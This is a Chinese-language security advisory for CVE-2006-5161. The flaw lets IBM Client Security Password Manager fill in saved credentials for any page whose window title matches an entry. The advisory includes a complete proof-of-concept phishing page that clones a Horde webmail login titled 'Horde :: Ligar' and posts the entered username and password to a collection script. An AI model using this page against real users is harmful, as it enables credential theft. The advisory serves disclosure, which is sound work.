发布日期：2006-10-04
更新日期：2006-10-09

受影响系统：

IBM IBM Client Security Password Manager

描述：

---

BUGTRAQ  ID: 20308
CVE(CAN) ID: CVE-2006-5161

IBM客户端安全密码管理器允许用户通过指纹认证应用表单。

IBM客户端安全密码管理器在处理用户认证信息交互时存在漏洞，远程攻击者可能非授权获取认证信息。

IBM客户端安全密码管理器将其配置情况映射到应用程序的“窗口名称”属性，因此恶意的攻击者可以通过钓鱼或跨站脚本等方式诱骗用户访问带有特定标题名称的网页，诱使用户发送认证凭据信息，进而获得非授权访问。

<*来源：Luís Miguel Silva （lms@ispgaya.pt）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115987578730767&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<!-- Horde: Copyright 2000-2004, The Horde Project. Horde is under the LGPL. -->
<!--                    Horde Project: http://horde.org/                     -->
<!--    GNU Library Public License: http://www.fsf.org/copyleft/lgpl.html    -->
<html lang="pt-PT" xmlns:IE><head>
<script language="JavaScript" type="text/javascript" src="/horde/js/enter_key_trap.js"></script>
<title>Horde :: Ligar</title>
<link href="/horde/themes/screen.css" rel="stylesheet" type="text/css" />
<link href="/horde/themes/bluewhite/screen.css" rel="stylesheet" type="text/css" />
<link rel="SHORTCUT ICON" href="/horde/themes/graphics/favicon.ico" />
<style>IE\:clientcaps {behavior:url(#default#clientcaps)}</style></head>

<body>
<IE:clientcaps ID="objCCaps" /><script language="JavaScript" type="text/javascript">
<!--
function setFocus()
{
    if (document.horde_login.horde_user.value == "") {
        document.horde_login.horde_user.focus();
    } else {
        document.horde_login.horde_pass.focus();
    }
}
function submit_login(e)
{
    if (typeof e != 'undefined' && !enter_key_trap(e)) {
        return;
    }

    if (document.horde_login.horde_user.value == "") {
        alert("Por favor, introduza o seu username e password");
        document.horde_login.horde_user.focus();
        return false;
    } else if (document.horde_login.horde_pass.value == "") {
        alert("Por favor, introduza o seu username e password");
        document.horde_login.horde_pass.focus();
        return false;
    } else {
        document.horde_login.loginButton.disabled = true;
        document.horde_login.ie_version.value = objCCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}", "componentid");
        document.horde_login.submit();
        return true;
    }
}
//-->

</script>

<form name="horde_login" method="post" action="get.php">
<input type="hidden" name="url" value="" />
<input type="hidden" name="ie_version" value="" />

<div id="menu">
<span style="float:right">
   </span>
<h1 style="text-align:center">Bem-vindo a um site de phishing!</h1>
</div>

<br class="spacer" />

<table width="100%"><tr><td align="center"><table width="300">


<tr>
    <td align="right" class="light"><b>Username</b>&nbsp;</td>
    <td align="left"><input class="fixed" type="text" name="horde_user" value="" /></td>
</tr>

<tr>
    <td align="right" class="light"><b>Password</b>&nbsp;</td>
    <td align="left"><input class="fixed" type="password" name="horde_pass" value="" /></td>

</tr>

<tr>
    <td>&nbsp;</td>
    <td class="light"><input name="loginButton" class="button" value="Ligar" type="submit" onclick="return submit_login();" /></td>
</tr>


</table></td></tr></table>
</form>

<!-- This file contains any "Message Of The Day" Type information -->
<!-- It will be included below the log-in form on the login page. -->

<br />

<script language="JavaScript" type="text/javascript">
<!--
function selectLang()
{
    // We need to reload the login page here, but only if the user
    // hasn't already entered a username and password.
    if (document.horde_login.horde_user.value == '' &&
        document.horde_login.horde_pass.value == '') {
        var lang_page = '/horde/login.php?new_lang=' + document.horde_login.new_lang[document.horde_login.new_lang.selectedIndex].value;
        self.location = lang_page;
    }
}

if (parent.frames.horde_main) {
    document.horde_login.target = '_parent';
}
//-->
</script>

<script language="JavaScript1.2" type="text/javascript">
<!--
// Setup the enter keytrap code.
if (window.document.captureEvents != null) {
    window.document.captureEvents(Event.KEYPRESS);
    window.document.onkeypress = submit_login;
}
//-->
</script>
<script language="JavaScript1.5" type="text/javascript">
<!--
var _setHordeTitle = 1;
try {
    if (parent.frames.horde_main) parent.document.title = 'Horde :: Ligar';
} catch (e) {
}
// -->
</script>
<script language="JavaScript" type="text/javascript">
<!--
if (typeof(_setHordeTitle) == 'undefined' && parent.frames.horde_main) parent.document.title = 'Horde :: Ligar';
// -->
</script>
<script language="JavaScript" type="text/javascript">
<!--
setFocus()
//-->
</script>
</body>
</html>

建议：

---

厂商补丁：

IBM
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ers.ibm.com/

浏览次数：3306
严重程度：0（网友投票）